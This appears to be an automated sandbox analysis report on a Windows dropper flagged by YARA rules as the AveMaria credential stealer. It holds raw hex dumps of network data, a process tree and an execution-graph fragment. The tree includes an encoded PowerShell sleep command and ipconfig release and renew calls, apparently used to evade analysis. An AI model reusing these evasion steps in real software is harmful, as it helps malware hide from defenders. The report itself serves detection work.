8e 55 40 c1 e3 c8 80 66 c3 44 60 de 7d f2 e8 76 de fe 77 d6 ca 02 0a df d1 fb 68 2e a0 5d 8e 9c eb 5d 5e 2b 94 d9 4a da 34
                                  Data Ascii: #<cof-V8Y[d)/8p]}R)?rh@OYnJ+}O-,o>21:Y^2,[8b~\;5+*Z`a9kpgc<!hM]u6[ V.^NnHRh(L>Z<8wmU@fD`}vwh.]]^+J4
                                  2022-11-29 15:56:46 UTC4179INData Raw: 3f 23 90 6c 87 24 ae a5 62 1f 2b 79 d2 f6 09 89 5d f9 c9 7d a0 5c 40 c1 d3 5e f1 d5 9e 74 6a 41 c0 46 61 be a3 46 0c 83 07 4b 9e 6e cc 39 80 51 a6 67 da 4a fb 37 1d db 45 ab a1 36 7e a0 22 a6 4c e6 88 3e d4 09 d9 ab e6 12 e7 79 e2 51 ed ff da 4e f4 84 b6 ef 33 d8 e8 08 0c 82 fe f0 49 73 b6 f2 f5 fc a3 99 18 40 e8 a9 25 30 fd 94 94 46 35 ca 71 13 f5 b3 e0 ef 13 b3 f7 6c e8 e9 2d f1 3b 97 a2 69 53 ff 6e 06 7c 6b a9 a5 c1 68 66 5d 23 9b 97 39 15 d3 94 1c ba c9 45 dd 9a 55 a9 20 b3 59 6d 91 51 a3 a5 d6 ca e3 3f 9e 48 17 f8 da 35 7a 61 42 c2 f4 ad fd 40 23 28 5b 58 b5 84 60 2a 8f 25 5f ce b5 54 69 84 0e d0 69 bd 83 57 a5 d7 73 bd 6c c4 86 12 d5 df b0 a4 b0 2a 99 10 72 67 1d 03 50 01 38 76 6b 41 7f 62 7f 06 1f f0 a0 d6 e2 f7 8b 70 a9 bd 5b af d3 a6 69 f1 65 60
                                  Data Ascii: ?#l$b+y]}\@^tjAFaFKn9QgJ7E6~"L>yQN3Is@%0F5ql-;iSn|khf]#9EU YmQ?H5zaB@#([X`*%_TiiWsl*rgP8vkAbp[ie`
                                  2022-11-29 15:56:46 UTC4195INData Raw: 05 9d 0e 75 da a4 47 df 6d ad a7 2e fd 09 5b e9 72 a1 f5 48 e0 13 53 cc 36 16 ad b0 9d f2 a3 8b 22 ba c4 8b dd 3f bb b4 52 5e 8f 48 f3 b0 ec 3a e3 17 17 43 5a 4d 5f 70 f7 40 69 dd f6 4b 41 90 ff 91 58 c5 9c ae 6d 2a 1d f9 6c 28 88 30 2a ce 81 d3 42 77 ee b1 92 d4 1f 7b 4e d2 4f 54 f4 e7 22 b2 fc 1e 5d ec 89 5d 1a 58 81 e5 48 ce 8b 37 92 e6 a6 38 ac 2f 6d fa e5 29 a2 21 5c 06 91 d3 39 11 f3 74 61 8a 81 4d 6b 11 00 f6 42 4a 8e 43 da 10 c8 f7 e0 aa 04 19 f6 6d d3 4d a7 cd e8 d8 95 f1 1b 15 df f5 23 cb 3c 99 8a e1 2b 9f ec bd 9f 21 00 35 85 60 4e 19 95 36 8a cb 8c c5 23 31 b6 9e 9b 67 86 98 3d 2d e7 85 23 5c 23 ba c2 b8 66 f1 58 15 e8 71 98 ce 3a 32 56 9a cb f6 98 6f 6c 75 85 be ef fc b7 ea b8 e4 b7 3e 42 4d c7 5f 66 a3 09 5e c1 7b 74 23 2e 77 6a 35 e2 2f 9e
                                  Data Ascii: uGm.[rHS6"?R^H:CZM_p@iKAXm*l(0*Bw{NOT"]]XH78/m)!\9taMkBJCmM#<+!5`N6#1g=-#\#fXq:2Volu>BM_f^{t#.wj5/
                                  2022-11-29 15:56:46 UTC4211INData Raw: 16 8b 78 23 81 f5 86 38 9d 5a 15 0b 9a fb 36 b3 3a 5f ad a1 b5 84 cd 52 2c c3 5d 02 d2 91 9b df e6 4a 7e f5 cb 33 7d 3b 85 a2 8e 7d c6 2a d9 62 10 c1 c7 00 f4 4b 91 04 fb e6 34 6c c8 a7 fd 9f 36 38 e4 ae f4 71 15 52 c9 6b 2d d3 7d 79 9f 2a 2b fa 17 bf 02 8a 33 05 cc 50 f0 aa b9 b7 35 64 9c fc 20 e8 8d 2a d6 29 92 4d 6f cb aa 17 3e bd d1 ee 2f c1 16 34 e2 fb d5 a9 9a af 65 a7 3e 82 1c 78 ea 8a 9e 08 63 3f 5a b9 1b e8 45 39 a6 6a f6 7a dc 88 13 13 90 2e 24 6c 2d 39 f3 ce 16 8f 06 00 1e b5 7c ef 14 30 98 af 2e 40 2f de 91 db 13 0f a3 86 f9 02 4d 67 53 5d 13 4e 7e cf bd e3 7c 7c 08 87 d6 9b 63 de 08 1b b6 b3 af 50 92 e5 2a 40 c4 05 fa 28 69 f7 8f ff 76 59 58 10 fb c6 8e 13 09 d6 27 c9 34 51 e5 73 0e c9 56 8c 42 e8 a0 87 2a 33 c6 a5 b1 51 d5 34 bd 1f 29 bc af
                                  Data Ascii: x#8Z6:_R,]J~3};}*bK4l68qRk-}y*+3P5d *)Mo>/4e>xc?ZE9jz.$l-9|0.@/MgS]N~||cP*@(ivYX'4QsVB*3Q4)
                                  2022-11-29 15:56:46 UTC4227INData Raw: f8 b7 67 25 3f 89 8e a8 5c e6 bf 08 8a ae 97 20 e8 82 cf f0 53 e9 ae 2f 38 65 61 f5 99 34 be 9e ad ef d3 a3 10 22 ef 38 52 bc 0e 91 67 0d f8 74 60 9a 25 02 6a 07 dc 65 4f 54 ca dc 61 1b 38 d6 55 e3 0d 81 87 72 79 88 1b cd 91 28 cc af 28 6d 50 00 04 2f 47 f8 ed ce 14 7a 84 85 dd 52 5a 72 6a 00 94 40 bc c6 72 5c 00 72 0a a7 d5 7f 19 27 10 bc a7 f4 b0 d3 03 e9 21 76 0d 69 cf 61 e7 99 a1 82 6f a6 93 ba 3f c7 d9 1e fc 5a 1a 38 e6 6e b3 7a 8f 72 84 3c 4a 46 3b 18 85 63 fd 9b 17 d8 32 e0 09 02 46 d3 32 dd 6b 27 51 f6 56 93 61 71 13 cd 52 c0 89 de 1e b0 8d 69 f1 53 e0 bd 1f a1 0f a8 cb ac 81 82 04 57 3a a5 d9 03 71 82 59 a7 d3 9a 61 9c d0 42 d1 c8 b4 98 15 6b 2a 01 3a 89 8e 2e 3c 87 c0 2b 8d 24 22 94 c3 9d 1c 4b 30 17 09 f3 4f 06 34 b0 b1 d5 5f 7e 0e 9e 38 10 74
                                  Data Ascii: g%?\ S/8ea4"8Rgt`%jeOTa8Ury((mP/GzRZrj@r\r'!viao?Z8nzr<JF;c2F2k'QVaqRiSW:qYaBk*:.<+$"K0O4_~8t
                                  2022-11-29 15:56:46 UTC4243INData Raw: 29 66 55 0b 25 b5 3e 55 65 d6 bc e2 97 26 ea b3 39 e5 ca 41 ff 1e 1d c5 0c 1d 4f 55 37 fa b8 72 db 01 4d 76 aa bd 1f ea 3d 8a f4 a6 fe 8d 1a 98 d6 c3 a0 55 1a 96 09 b0 ec 60 21 01 d3 53 96 20 de ce fb 84 69 ed 4c 90 62 31 d8 8f 8a 51 d0 96 2f 85 26 f3 1c ee d2 fb 9d 28 f7 97 d0 ec 73 ae 33 0c 0c b4 39 d3 97 61 b6 82 99 77 20 86 ba 69 af 2a ab c4 fa 10 0c dc 90 42 4f d9 f5 8c ae 6e e7 be b8 ef be 96 06 8a 0e 7d be 45 dc e1 53 f1 ee 5a d0 d3 8f 74 9f be 78 e1 a1 ea 68 c5 c7 f1 35 b7 4c 95 2e 91 81 7b 4b 03 6e 70 bc 24 1e 6b c7 53 c1 c6 a9 66 bf 27 e9 5b f8 77 ef 41 11 0d 8f fe ab 42 d1 b3 e5 a7 3c 6a b3 3c 39 1b 9e 81 83 0f 88 2a 48 8f 6e 50 4a 4d f4 be b3 8d cd 27 f2 e1 50 53 22 47 fe 44 a2 c5 27 a1 93 8a 26 17 e1 6c 5b 40 7c e3 82 db ef 6e da 66 fb 6b 97
                                  Data Ascii: )fU%>Ue&9AOU7rMv=U`!S iLb1Q/&(s39aw i*BOn}ESZtxh5L.{Knp$kSf'[wAB<j<9*HnPJM'PS"GD'&l[@|nfk
                                  2022-11-29 15:56:46 UTC4259INData Raw: e1 d8 e1 8c d4 c9 cf 34 f4 fc 99 b1 f5 a8 1d 4f 6e 3f 14 9f 39 f0 e2 ca 8c df 23 00 01 e7 b3 2a 34 4f b0 6f b1 11 21 25 72 67 c8 a7 ce 6d 76 1c 32 27 4f 63 2d fd 4d 2b cb 35 8d 1d c1 66 0d c8 ae 0f 62 47 2a 93 7e 00 1a 5e 9d 88 59 9a 85 ff 26 68 a1 47 b3 c5 f0 56 f5 f2 a7 1b 3a 1f ae 1d f7 33 7b b9 cd cb 40 c3 aa ef 1a 1a b9 b6 2c cb e5 29 8f 41 77 c3 53 7f 8c 89 f7 d9 8f 3f 62 84 20 25 37 7c 1c 63 4f a4 1b 8a 8e 20 30 5d 55 41 95 f9 83 ab df 53 35 c1 03 bc 38 42 5f 12 dc 39 8f b2 c3 7d d6 f6 a7 17 6c bb 56 93 08 da ca c4 52 31 23 a2 90 3f 3d 00 f9 db 35 f7 1c b6 36 ea 04 4f c8 29 23 9f 8e e7 ec 60 7d bb 11 00 ea c9 34 73 53 cf 67 5b 62 89 35 1f 9d 84 c2 d0 27 c3 de 47 5f 27 54 70 aa af 3e 76 b1 c1 0b c4 6b ee 7d 24 13 14 c2 56 20 fc 77 aa c2 00 52 38 d1
                                  Data Ascii: 4On?9#*4Oo!%rgmv2'Oc-M+5fbG*~^Y&hGV:3{@,)AwS?b %7|cO 0]UAS58B_9}lVR1#?=56O)#`}4sSg[b5'G_'Tp>vk}$V wR8
                                  2022-11-29 15:56:46 UTC4275INData Raw: db 4a 1b e7 a2 ff f4 23 ce 40 70 3f 33 89 09 dc 84 ad c6 e1 71 af 11 5c 35 ae 03 fb 80 57 f5 ca d0 55 03 85 62 53 5d a4 df 07 61 13 3e d5 c4 3e a7 22 71 40 99 bd 37 da 02 6c da e7 55 0c 2c 5e 7e b3 c0 8d fe 34 9c bb 05 fa ef 4c 6b 6d 1b c8 4b fa 49 f7 c9 89 6a b5 e9 b0 36 be 9b be 88 43 aa fc 6b d8 84 e8 10 80 45 ea d0 c7 8a ed cd 49 eb 5f 3e 40 11 9f db d8 80 b3 ef 41 70 75 91 2c 5f 11 25 83 15 11 75 9a d9 6e e1 85 23 19 db 5a e7 be be 8d 8a c8 ef eb 0a 02 e9 49 4c 3e f2 b1 f2 0d b2 b1 7a 43 38 9d ff fe c4 40 20 96 e9 56 71 b7 83 1d b9 84 fc 23 4f f1 3a 37 a2 77 1e 09 54 5f 5d 6a ad c6 18 b7 42 16 7d cf 9d f5 6e 71 83 1a 9b ba 98 15 7e 63 68 3a 18 0f 9e 95 3c 10 83 c8 ae 6b 0e b4 8e 2e 4f 2f af aa b2 6b 7a 52 17 e1 7a d3 52 3d f8 28 d1 ae 63 12 22 e1 0d
                                  Data Ascii: J#@p?3q\5WUbS]a>>"q@7lU,^~4LkmKIj6CkEI_>@Apu,_%un#ZIL>zC8@ Vq#O:7wT_]jB}nq~ch:<k.O/kzRzR=(c"
                                  2022-11-29 15:56:46 UTC4291INData Raw: aa 82 dd cd 84 ff dc 07 45 12 8f 74 3e 1a 39 6e 87 94 ee cc be f1 17 71 75 52 ed d3 f4 23 a0 a9 8d e3 74 f8 26 2f 16 5c 8b 8e 1b ac 07 6e 57 d1 4e e7 bc 86 6d 12 e2 9c f7 a7 28 a9 49 95 ba 65 cb d4 6c 4c e9 50 49 99 5e 80 98 70 f6 bd 01 03 8a f8 1a 48 77 b2 8c 17 9a d4 7a ed f4 0a 3f 0b f9 3b 00 03 f0 01 8d 78 9b 45 a0 07 45 4a cb 6f 31 e9 b5 75 be 38 f5 6f 09 ec d2 22 61 2f 53 b5 0c dd 92 27 ca 19 c1 10 18 95 0e 8c 08 7d b0 a4 d5 f6 17 28 56 77 8a 18 9a 6d 29 3b a1 6e 60 01 ca 88 85 d9 fd b1 19 72 33 25 b7 9a c1 b7 94 3b 09 3d a4 41 c0 a1 80 20 3c 9f f7 8a 1c 07 c7 19 c3 7e f5 00 b6 b9 e4 77 a5 fd e8 1e 55 bd dd c9 4c f4 2b fe 42 d6 26 b2 23 36 64 9f f4 04 a3 25 f3 e0 52 76 1e 1f 8b 2d 54 c3 3c b1 b4 24 63 38 a4 38 12 27 dc 3f 0c f6 07 f0 0d 72 f2 ff 68
                                  Data Ascii: Et>9nquR#t&/\nWNm(IelLPI^pHwz?;xEEJo1u8o"a/S'}(Vwm);n`r3%;=A <~wUL+B&#6d%Rv-T<$c88'?rh
                                  2022-11-29 15:56:46 UTC4307INData Raw: 11 34 ff ab 32 47 66 7c b5 cd 05 26 be 85 7c 84 6a 29 6d f4 bc 67 4b 09 82 31 f4 7c cf b9 c2 65 4d 98 af f8 3a cb 4d 6d 8d 5f 92 1b 26 bd 86 77 3a 02 a9 a4 fc a0 15 5e 98 8c d7 9e 91 af 29 18 68 0b 75 03 33 b1 43 19 20 e0 93 97 1a 39 29 73 b0 75 34 c5 c1 b6 e1 4a e4 dc 3e bc 65 f1 2b 3c 4f c2 7f 7e 26 df 83 85 bf 51 24 38 fe eb 8a 72 ab cb 29 39 f4 ad a9 7a dd 72 3e 6a e9 80 98 a7 c2 21 12 7c 08 88 03 94 db dd f6 b2 36 65 a5 84 8a d7 be 71 67 12 fa 8a 16 a8 6f b5 25 13 4c f1 05 88 eb 18 7a 76 64 94 42 9e f6 60 83 47 7f 0c 0d fc 9f a4 89 ce af 14 5a 88 52 9f 6c 00 70 9c 27 e6 39 cc b9 ec 17 52 9a 95 b7 de 9e 26 9c 48 eb 40 3a f2 36 46 5e b4 1a 62 f6 e8 5a 40 bb 36 27 7d bb 7e 33 98 f7 3a ef 45 11 43 42 e6 48 3e 84 fe 11 d4 6a 02 33 52 11 40 4b 45 fa da e9
                                  Data Ascii: 42Gf|&|j)mgK1|eM:Mm_&w:^)hu3C 9)su4J>e+<O~&Q$8r)9zr>j!|6eqgo%LzvdB`GZRlp'9R&H@:6F^bZ@6'}~3:ECBH>j3R@KE
                                  2022-11-29 15:56:46 UTC4323INData Raw: f3 53 6d cd 89 8d 87 c3 0b 3b 05 d2 35 a2 cc 23 1b d0 79 d0 eb be 71 8f ca 56 d4 44 e0 80 aa 60 ae ca 0b 51 8c 5e c8 3d 0f 39 7a 08 6f 6c 6b 2a 7c ef be 0c 55 9c c8 1d 9b 20 0f 28 56 29 f4 ca 1f 16 0d 40 c1 e7 76 09 72 a9 da 1c 32 74 aa 85 e9 a6 c7 79 cd e1 30 d0 b7 a1 14 f6 7b fe d7 28 3b e9 f2 a0 f0 bb 00 f3 3f 8b 88 43 88 32 82 5c 48 5c 23 0e 6b 0d 69 c0 4c 9e 43 5c b1 fb e8 29 72 56 8f b3 2e 12 3f 62 a4 13 0f 8c 76 92 f9 4e fa 30 b7 ef 02 8c 5b 61 d2 15 66 cb 87 86 c1 b9 7e 9c 69 7a 08 63 74 99 93 e5 9b f9 e6 20 d7 4f 56 73 9c 1d 2e 90 d0 39 1a a9 60 b5 c2 94 2b 97 4c d6 1f e0 b3 ac 71 00 ca b1 20 c1 76 b1 d6 e2 4e cc e4 90 2a bb 56 fe c0 f6 20 b4 0a ed 92 01 53 d3 0e 4e 92 39 b4 e0 ff da 9a db 71 4f 10 49 64 9e 55 fc 7a 81 93 de d3 00 65 1a 29 1c 33
                                  Data Ascii: Sm;5#yqVD`Q^=9zolk*|U (V)@vr2ty0{(;?C2\H\#kiLC\)rV.?bvN0[af~izct OVs.9`+Lq vN*V SN9qOIdUze)3
                                  2022-11-29 15:56:46 UTC4339INData Raw: 82 32 d8 96 e1 15 21 69 92 32 33 23 4b 84 75 37 48 db f3 b8 74 4a b0 cc 44 40 1b 53 6e 6c c4 ea 4e e4 3f e7 80 ee a0 77 e0 15 3c cc 5f 00 1f 1e 64 c3 81 b1 62 c7 c6 7e d4 08 a3 06 29 ad 9b e8 25 36 84 90 b9 91 6c 0f 63 96 a5 01 70 67 b2 d5 38 58 c3 8e 03 43 fc 2f 93 50 f2 1f f7 b2 08 17 00 5e 06 d1 47 a5 2a c4 b7 ff ab f5 4a 61 b5 d2 9c f2 dc a9 d1 7b b2 b4 ab 80 70 14 bc 5f ef ea 0f 35 d9 5b 81 79 4b 4b 89 56 9e 77 9e 5c 58 09 ff 3b a9 89 14 b4 d5 5e 5a 37 3c 2d fe 0f d8 8b 00 68 72 50 ba 79 b9 b0 a4 09 f7 bc af 69 c5 23 fc 6d 65 f6 59 53 b0 90 77 b3 ab 97 60 da e4 06 9f 7d 03 49 88 cb 50 3f 41 9c e3 81 2e 15 a4 83 13 48 7d 42 f4 5b 36 51 4b 98 c3 d2 dd 84 d3 16 6d a7 af b9 8a 1a bf 19 68 1d db e0 36 c0 03 63 d9 60 d2 14 a2 5b 4f 52 72 7b f7 80 fa b2 06
                                  Data Ascii: 2!i23#Ku7HtJD@SnlN?w<_db~)%6lcpg8XC/P^G*Ja{p_5[yKKVw\X;^Z7<-hrPyi#meYSw`}IP?A.H}B[6QKmh6c`[ORr{
                                  2022-11-29 15:56:46 UTC4355INData Raw: 60 83 8a 83 11 70 97 12 70 52 96 c2 bd 78 10 ec b4 44 f5 e8 14 bd 4f 58 91 38 50 29 96 c5 5e a9 8c 29 ac 2a 5f 70 55 77 a9 15 fd b3 5a 8a b1 31 f2 80 70 ad 31 6d e9 35 d0 69 9d ea aa a2 6d 7f a5 f6 ea aa 78 af 59 c7 b7 cc 7e 74 c2 6b fc 56 ad 42 02 44 b1 de fd eb 2f fc 68 53 42 7e b7 42 86 b7 d9 83 24 72 83 34 fe 8e 45 83 27 ba 70 9f 92 de 3b ff 9b 2a 62 1a 03 04 31 ac 3f 22 de b9 9f 1b d9 7f a0 b2 83 c0 ea 82 00 e2 f8 6d c5 95 6a 5f 55 b8 ba 9c 08 d4 4d 04 d1 aa f2 1f b9 46 71 11 eb fa cb e6 ba 19 1f c5 78 d8 38 4f f2 fb b8 60 ef 3f 38 99 0d 5b be 58 b5 3d ea 4e 4d 13 54 e3 5e c5 38 79 e9 3e 79 5b 9c 09 f5 a7 23 85 99 61 7d e8 11 af 74 45 d9 9b 14 9f bb 9b e5 3e a1 a2 ad 95 1b af 84 69 dc c1 a0 6a f1 83 45 89 cb 06 b7 0b bf 38 9a c3 9e 46 fd 10 68 ac 82
                                  Data Ascii: `ppRxDOX8P)^)*_pUwZ1p1m5imxY~tkVBD/hSB~B$r4E'p;*b1?"mj_UMFqx8O`?8[X=NMT^8y>y[#a}tE>ijE8Fh
                                  2022-11-29 15:56:46 UTC4371INData Raw: fa 1f 0d e9 ee 42 0b 14 9a b7 80 79 2c 76 ac 8b 00 61 a4 fe 86 6f 1c f9 f1 c4 66 21 a4 0b 61 50 35 ef 67 e2 13 48 61 bc e5 0f f6 ed 69 85 c3 9c 24 d6 9c 42 bb ba 0d 84 7f 0c 9e e1 ef 75 9f 21 d6 be 8c 71 63 48 ac c8 d2 c7 84 31 46 2e eb 65 53 2c 99 59 a9 42 48 d1 41 fb e1 50 cf 11 77 2e c7 c0 1b e0 52 91 3c d9 18 6b e7 4d c7 aa 4b 7d bf 4f d0 8d b5 f8 e1 4a a1 89 20 14 b0 bd eb 28 43 3a f3 fc 95 30 44 2b 97 03 42 57 10 35 d8 c1 17 88 6b 19 d6 5e 4d a7 02 45 89 14 f0 9d 7e b6 34 49 02 ab c3 b2 7b b7 c9 b7 32 4d 9e 33 b6 c7 a6 9e 4c ca f0 ec 2e c1 95 ce 2c 2a f6 4f 3c 5d 4d 20 0f 2d cc 1b b0 1f da 03 bd 21 c4 76 67 40 bb 81 49 44 b9 82 ca 83 4b df 1a 8c 96 84 61 1b 0e cb a5 dd 96 7d 29 af d3 11 cd ca 98 2f 4d 12 e7 7a ba 83 04 1e d8 ac f1 30 90 75 92 28 61
                                  Data Ascii: By,vaof!aP5gHai$Bu!qcH1F.eS,YBHAPw.R<kMK}OJ (C:0D+BW5k^ME~4I{2M3L.,*O<]M -!vg@IDKa})/Mz0u(a
                                  2022-11-29 15:56:46 UTC4387INData Raw: ca 71 be 96 d8 c4 c9 ac 1d 95 c6 e3 d7 34 07 9a 14 06 67 25 5a 7f 9b 20 22 61 a4 9b 29 e5 ae 81 c9 1a 5c 25 ff 88 7b 16 5b 3a 86 21 94 5b 0a 61 1b 56 5e dc ae 95 90 fc 9d 80 d1 6a 29 61 44 f6 b6 5e f5 3d 4a 31 d9 d0 d3 74 bb 9a b2 ae eb 43 4b f1 d5 b4 e8 36 20 a6 38 cd 6e 3d ac 0e 20 61 75 02 00 38 62 52 d2 c0 99 c7 ec bb 3f 23 66 3b d5 63 eb cc 52 fe 97 b7 bc 75 ee b2 f2 35 29 a7 f6 94 31 61 da 05 d5 47 6a bd f8 3a 17 9c 10 57 f9 df e0 4a 50
                                  Data Ascii: q4g%Z "a)\%{[:![aV^j)aD^=J1tCK6 8n= au8bR?#f;cRu5)1aGj:WJP


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:16:54:27
                                  Start date:29/11/2022
                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  Imagebase:0x150000
                                  File size:1056256 bytes
                                  MD5 hash:373574C70AB6F299813FDAFA9C12AB9B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low

                                  Target ID:1
                                  Start time:16:54:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"powershell" Get-Date
                                  Imagebase:0x1e0000
                                  File size:430592 bytes
                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  Target ID:2
                                  Start time:16:54:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:5
                                  Start time:16:55:38
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig/release
                                  Imagebase:0xd90000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:6
                                  Start time:16:55:39
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:7
                                  Start time:16:55:39
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                  Wow64 process (32bit):true
                                  Commandline:ipconfig /release
                                  Imagebase:0xc30000
                                  File size:29184 bytes
                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:8
                                  Start time:16:55:39
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
                                  Imagebase:0x1e0000
                                  File size:430592 bytes
                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  Target ID:9
                                  Start time:16:55:39
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:13
                                  Start time:16:56:31
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig/renew
                                  Imagebase:0xd90000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:14
                                  Start time:16:56:31
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:15
                                  Start time:16:56:31
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                  Wow64 process (32bit):true
                                  Commandline:ipconfig /renew
                                  Imagebase:0xc30000
                                  File size:29184 bytes
                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:16.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:111
                                    Total number of Limit Nodes:12
                                    execution_graph 10136 bbe7b8 10137 bbe820 CreateWindowExW 10136->10137 10139 bbe8dc 10137->10139 10142 bb5b08 10143 bb5b36 10142->10143 10146 bb5004 10143->10146 10145 bb5b56 10147 bb500f 10146->10147 10148 bb625e 10147->10148 10150 bb7990 10147->10150 10148->10145 10151 bb79b1 10150->10151 10152 bb79d5 10151->10152 10154 bb7b40 10151->10154 10152->10148 10155 bb7b4d 10154->10155 10156 bb7b86 10155->10156 10158 bb6e80 10155->10158 10156->10152 10159 bb6e8b 10158->10159 10160 bb7bf8 10159->10160 10162 bb6eb4 10159->10162 10163 bb6ebf 10162->10163 10169 bb6ec4 10163->10169 10165 bb7c67 10175 bbc440 10165->10175 10183 bbc428 10165->10183 10166 bb7ca0 10166->10160 10170 bb6ecf 10169->10170 10191 bb7248 10170->10191 10172 bb839c 10172->10165 10173 bb7990 5 API calls 10173->10172 10174 bb8174 10174->10172 10174->10173 10178 bbc471 10175->10178 10179 bbc562 10175->10179 10176 bbc47d 10176->10166 10177 bbc4bd 10212 bbd9b8 10177->10212 10178->10176 10204 bbc6a8 10178->10204 10208 bbc698 10178->10208 10179->10166 10185 bbc471 10183->10185 10186 bbc562 10183->10186 10184 bbc47d 10184->10166 10185->10184 10189 bbc6a8 3 API calls 10185->10189 10190 bbc698 3 API calls 10185->10190 10186->10166 10187 bbc4bd 10188 bbd9b8 GetModuleHandleW 10187->10188 10188->10186 10189->10187 10190->10187 10192 bb7253 10191->10192 10193 bb952a 10192->10193 10196 bb9579 10192->10196 10200 bb9588 10192->10200 10193->10174 10197 bb95cb 10196->10197 10198 bb95d6 KiUserCallbackDispatcher 10197->10198 10199 bb9600 10197->10199 10198->10199 